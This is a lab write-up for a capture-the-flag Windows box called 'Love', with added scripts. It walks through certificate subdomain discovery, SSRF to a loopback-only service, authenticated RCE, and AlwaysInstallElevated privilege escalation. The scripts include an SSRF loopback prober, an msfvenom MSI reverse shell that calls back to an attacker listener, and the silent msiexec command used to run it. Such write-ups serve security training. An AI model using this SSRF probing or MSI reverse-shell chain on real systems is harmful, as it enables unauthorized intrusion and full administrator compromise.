Love
Gaining Access
Nmap scan:
Lots of ports open.
TLS Cert Checking
Port 80 reveals a voting system that requires credentials. Port 5000 was blocked off from the outside for whatever reason, which becomes relevant later.
A bit of enumeration of the service running on port 80 reveals that it is an outdated piece of software with plenty of public vulnerabilities:
Checking the certificate on port 443 reveals a hidden sub-domain in the names the certificate was issued for. We can add it to the /etc/hosts file and browse to it.
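The certificate check above, as an added example (not code from the original write-up): fetch the certificate from 443, pull every hostname out of the Subject CN and the SubjectAltName DNS entries, and emit the matching /etc/hosts lines. The hostnames and IP in the usage line are placeholders, not the ones on the box.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: pull the TLS certificate
# from port 443, list the hostnames in its Subject CN and SubjectAltName, and
# print ready-to-append /etc/hosts lines. The hostnames used in the usage line
# are placeholders, not the ones on the box.
set -euo pipefail

# Fetch the leaf certificate and dump it as text (needs network + openssl).
# -servername sends SNI; if the default vhost shows a different cert, run it
# again without -servername and compare.
fetch_cert_text() {
    local host=$1 port=${2:-443}
    openssl s_client -connect "${host}:${port}" -servername "$host" </dev/null 2>/dev/null \
        | openssl x509 -noout -text
}

# Read `openssl x509 -text` output on stdin and print every hostname found in
# the Subject CN and the SAN DNS entries: one per line, deduplicated, in order.
cert_hostnames() {
    awk '
        /Subject:/ {
            if (match($0, /CN *= *[^,]+/)) {
                cn = substr($0, RSTART, RLENGTH); sub(/CN *= */, "", cn); print cn
            }
        }
        /DNS:/ {
            n = split($0, parts, /,/)
            for (i = 1; i <= n; i++)
                if (match(parts[i], /DNS:[^ ]+/))
                    print substr(parts[i], RSTART + 4, RLENGTH - 4)
        }
    ' | awk '!seen[$0]++'
}

# Read hostnames on stdin and print /etc/hosts lines for the given IP.
hosts_lines() {
    local ip=$1 name
    while IFS= read -r name; do
        if [ -n "$name" ]; then
            printf '%s\t%s\n' "$ip" "$name"
        fi
    done
}

# Usage (placeholders):
#   fetch_cert_text example.htb | cert_hostnames | hosts_lines 10.10.10.1 | sudo tee -a /etc/hosts
```

Run the fetch both with and without `-servername`: a server that selects certificates by SNI can hand out a different certificate, and therefore a different set of names, depending on which hostname you ask for.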
SSRF -> Authenticated RCE
The sub-domain found reveals this:
Signing up and viewing it directs us to this page:
I was able to get hits on an HTTP server hosted on my machine, but I could not download or execute anything. Since it is the server itself that sends the request, a port that is blocked from the outside may still be reachable from the server's own loopback interface, so I tried entering http://localhost:5000 and was returned this:
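The loopback probing described above, as an added example (not code from the original write-up): drive the site's URL-fetching feature as an SSRF oracle against services that are firewalled from the outside, port 5000 included. The endpoint URL, the form field name (`url`) and the session cookie are assumptions; take the real ones from the request captured in your proxy.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: use the site's
# URL-fetching feature as an SSRF oracle against loopback services that are
# firewalled from the outside (port 5000 here). The endpoint URL, the form
# field name ("url") and the session cookie are assumptions; take the real
# ones from the request captured in your proxy.
set -euo pipefail

# Loopback spellings worth trying: a naive host blacklist often matches only one.
LOOPBACKS=(localhost 127.0.0.1 127.1 0.0.0.0 "[::1]")

# Print one candidate URL per loopback spelling for each port given.
candidate_urls() {
    local port lb
    for port in "$@"; do
        for lb in "${LOOPBACKS[@]}"; do
            printf 'http://%s:%s/\n' "$lb" "$port"
        done
    done
}

# Submit each candidate URL (stdin) to the form and report the response size;
# a refused connection and a real page from the hidden service differ in size,
# so the outliers are the ones to open in the browser.
ssrf_probe() {
    local endpoint=$1 field=${2:-url} cookie=${SSRF_COOKIE:-} target size
    while IFS= read -r target; do
        size=$(curl -s -o /dev/null -w '%{size_download}' \
                    -b "$cookie" --data-urlencode "${field}=${target}" "$endpoint")
        printf '%-32s %s bytes\n' "$target" "$size"
    done
}

# Usage (placeholders):
#   SSRF_COOKIE='session=...' candidate_urls 5000 80 443 8080 | ssrf_probe http://internal.example.htb/
```

Comparing response sizes is the cheapest oracle: every refused or filtered target tends to produce the same error page, so one line with a different size is usually the service you were looking for.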
With those credentials, we can get a shell using a publicly available authenticated RCE exploit. Just change the settings here:
Then run the exploit:
Privilege Escalation
AlwaysInstallElevated
Once on the machine, I ran winPEAS to enumerate for me and found that AlwaysInstallElevated was set to 1.
With this policy in place, any .msi package is installed by msiexec with elevated privileges, so whatever the package runs is executed at that level. As such, we first need to generate a quick reverse shell packaged as an MSI using msfvenom.
Afterwards, we would get a shell as the administrator:
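The attacker-side workflow for this privesc, as an added example (not code from the original write-up): confirm from a pasted `reg query` dump that the policy is set in both hives, build the MSI reverse shell, and start the listener. LHOST, LPORT and file paths are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: the attacker-side
# workflow for the AlwaysInstallElevated privesc. LHOST/LPORT/paths below
# are placeholders.
set -euo pipefail

# Step 1 (on the target, cmd.exe): dump the policy value from BOTH hives:
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# The policy is only honoured when both values are 0x1 (winPEAS checks both).
# Paste the combined output into this function; it returns 0 only when both
# hives are set. Windows line endings are stripped first.
always_install_elevated() {
    tr -d '\r' | awk '
        /^HKEY_LOCAL_MACHINE/ { hive = "HKLM" }
        /^HKEY_CURRENT_USER/  { hive = "HKCU" }
        /AlwaysInstallElevated[ \t]+REG_DWORD[ \t]+0x1[ \t]*$/ { ok[hive] = 1 }
        END { exit !(ok["HKLM"] && ok["HKCU"]) }
    '
}

# Step 2: build the MSI. An msfvenom .msi runs its payload during the install
# phase; the "install" itself then fails, which does not matter.
build_msi() {
    local lhost=$1 lport=$2 out=${3:-shell.msi}
    msfvenom -p windows/x64/shell_reverse_tcp LHOST="$lhost" LPORT="$lport" -f msi -o "$out"
}

# Step 3: listener on the attacker side. Then transfer shell.msi to the target
# and run it from the low-privileged shell:
#   msiexec /quiet /qn /i C:\Windows\Temp\shell.msi
# /quiet /qn suppress the installer UI so it does not hang waiting for a click.
listen() {
    nc -lvnp "$1"
}

# Usage (placeholders): build_msi 10.10.14.5 4444 && listen 4444
```

If only one hive reports 0x1 the install is not elevated and msiexec simply fails, so check both before spending time on the payload.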